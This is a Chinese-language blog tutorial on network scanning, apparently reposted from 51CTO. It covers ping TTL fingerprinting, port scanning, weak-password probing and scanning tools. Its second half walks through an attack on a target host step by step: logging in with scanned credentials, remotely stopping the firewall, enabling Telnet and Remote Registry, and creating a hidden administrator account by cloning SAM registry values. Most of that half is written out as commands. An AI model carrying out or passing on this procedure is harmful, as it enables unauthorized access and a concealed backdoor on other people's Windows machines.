第2章-掃描技術
一、掃描技術概述
描描指的是利用工具軟體來探測目标網絡或主機的過程,其目的隻有一個:為即将采取的攻擊或防禦行動收集情報
(1)、掃描原理
1、ping檢測
Øping指令是最常用的網絡連接配接診斷工具,當然也可作為最基礎的掃描工具
Ø利生ICMP協定的響應機制,可以對目标IP位址、主機線上情況、作業系統類型等資訊作出初步判斷
【ping來判斷目标主機的作業系統情況】
a)TTL值趨近于128:windows XP/windows server 2000/windows server 2003
b)TTL值趨近于64 :windows 7/windows 2008
c)TTL值趨近于255:交換機、路由器等裝置
如下圖所示
<a target="_blank" href="http://blog.51cto.com/attachment/201307/124946212.jpg"></a>
2、端口掃描
Ø主要針對特定的網絡服務進行探測,嘗試連接配接目标主機的特定端口,根據回報結果來判斷是否開啟指定服務
Ø分類:TCP端口掃描、UDP端口掃描
【TCP端口掃描】
會向對方發送一個請求或終止通路的資料包,若對方給出正常回應,則表示目标服務開啟,否則表示端口關閉或可能被防火牆攔截
【UDP端口掃描】
通常會發送一個空資料包,若回報錯誤消息,則表示目标服務開啟,否則會告知端口不可達
【指令格式】
telnet ip位址端口号如“telnet 192.168.4.17 21”
<a target="_blank" href="http://blog.51cto.com/attachment/201307/124957411.jpg"></a>
3、OS探測
Ø也就是作業系統(Operating System)探測,指的是擷取目标主機所使用的作業系統類型,版本等相關資訊的過程
Ø探測試式:随便通路一個不存在的網頁,通常能夠在出錯頁面上得到web服務程式的版本資訊
<a target="_blank" href="http://blog.51cto.com/attachment/201307/125004795.jpg"></a>
4、弱密碼探測
Ø弱密碼探測的方式類似于暴力破解,隻不過并不嘗試所有可能的密碼,而隻是嘗試安全性極差的密碼,如“abc123、123456”等
5、漏洞評估
Ø漏洞評估(或稱弱點評估),一般用在正面的系統安全加強工作中,主要針對伺服器系統各種已知的漏洞進行檢測,同時對各種公認的或潛在的見險進行摸拟,進而全面判斷目标主機的安全性
Ø漏洞評估通常由一系列獨立的掃描插件來執行,而并不是單一的掃描任務
(2)、常見的掃描工具
1、SuperScan
一款免費的TCP/UDP端口掃描工具,網址“www.foundstone.com”
2、Fluxay(流光)
由國内的“小榕軟體實驗室”開發的一款強大的內建掃描軟體,網址“www.netxeyes.com”
3、X-Scan
由國内的“安全焦點”出品的漏洞檢洞工具,網址“www.xfocus.net”
4、MBSA
MBSA全稱“Microsoft BaselineSecurity Analyzer”微軟基準安全分析
器,由微軟公司開發的一款免費的作業系統安全評估工具,網址“www.microsoft.com”
5、Wikto
在Windows平台運作的Web弱點掃描工具,采用C#語言編寫,網址
“www.sensepost.com”
二、建立隐藏使用者的方法
本案例是用在被攻擊者主機上建立,也可在自己的主機上建立
1、用掃描工具擷取到對方的賬戶和密碼
2、用擷取到的賬戶和密碼先進入系統(假如對方IP為192.168.10.10,掃描到的密碼為123456)
net use \\1962.168.10.10 /user:administrator 123456
3、遠端關閉對方的防火牆
sc \\192.168.10.10 stop sharedaccess
4、遠端開啟對方的遠端服務
sc \\192.168.10.10 start tlntsvr start= auto
sc \\192.168.10.10 start tlntsvr
5、遠端開啟對方的系統資料庫服務
sc \\192.168.10.10 config remoteregistry start= auto
sc \\192.168.10.10 start remoteregistry
6、遠端登入系統
telnet 192.168.10.10
7、建立隐藏使用者(假如取名為benet)
net user benet$ 123456 /add
8、打開本地系統資料庫(regedit)
選擇“檔案”→→選擇"連接配接到網絡系統資料庫"→→輸入“對方IP:192.168.10.10”→→點選進入
9、賦予完全控制權限并編輯系統資料庫
HKEY_LOCAL_MACHINE→SAM→SAM→Domain→Account
users:權限(F)、功能(V)在這個選項裡
Names:賬戶在這個選項裡
把管理者權限(ox1-F4)“0000001F4”複制給benet使用者(0x3eb)“0000003EB”
10、在導出benet使用者的“Names”和“Users”
說白了就是做個備份,導入位置随便哪都行
11、遠端删除benet使用者
net user benet$ /del
12、最後,在導入剛才導出的benet使用者
13、隐藏使用者建立成功
《注意》:如果是在本地建立的話,前面6步就可以省略,直接從第7步開始
本文轉自甘兵 51CTO部落格,原文連結:http://blog.51cto.com/ganbing/1258688,如需轉載請自行聯系原作者